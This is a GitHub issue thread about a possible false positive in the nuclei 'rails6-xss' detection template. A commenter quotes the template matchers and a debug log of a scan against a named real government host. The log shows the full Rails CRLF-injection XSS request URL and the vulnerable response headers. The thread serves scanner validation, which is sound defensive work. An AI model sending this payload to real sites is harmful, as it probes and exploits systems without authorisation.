### ISSUE TITLE
[false-positive] rails6-xss

### ISSUE THREAD

**Issue by pdelteil** [projectdiscovery/nuclei-templates#1266]

**Comment by geeknik** [comment]
From what I can see in the template:
```
matchers-condition: and
    matchers:
      - type: word
        words:
          - 'javascript:alert(1)'
        part: body
      - type: status
        status:
          - 302
      - type: word
        words:
          - 'Location: aaaaa'
          - 'text/html'
        part: header
        condition: and
```

This particular host looks like a true positive to me:

```
x@1:~/nuclei-templates# ▶ nuclei -r /root/resolvers.txt -t vulnerabilities/rails/rails6-xss.yaml -target https://gitlab-unb.cade.gov.br -debug-resp -v

                       __     _
     ____  __  _______/ /__  (_)
    / __ \/ / / / ___/ / _ \/ /
   / / / / /_/ / /__/ /  __/ /
  /_/ /_/\__,_/\___/_/\___/_/   v2.3.4

                projectdiscovery.io

[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[VER] Downloading config file from https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore
[WRN] nuclei-templates are not installed (or indexed), use update-templates flag.
[VER] Identified 1 templates
[INF] Loading templates...
[INF] [rails6-xss] Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) (@ooooooo_q (Original finder), Rahul and Harsh (Template author)) [medium]
[INF] Loading workflows...
[INF] Using 1 rules (1 templates, 0 workflows)
[VER] [rails6-xss] Sent HTTP request to https://gitlab-unb.cade.gov.br/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
[INF] [rails6-xss] Dumped HTTP response for https://gitlab-unb.cade.gov.br/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa

HTTP/1.1 302 Found
Connection: close
Content-Length: 94
Content-Type: text/html; charset=utf-8
Date: Mon, 12 Apr 2021 02:31:19 GMT
Location: javascript:alert(1)//
Location: aaaaa
Referrer-Policy: strict-origin-when-cross-origin
Server: nginx
Strict-Transport-Security: max-age=31536000
X-Request-Id: C3ysYENwHC3
X-Runtime: 0.028346

javascript:alert(1)//eing <a href="
aaaaa">redirected</a>.</body></html>
```

What am I missing?
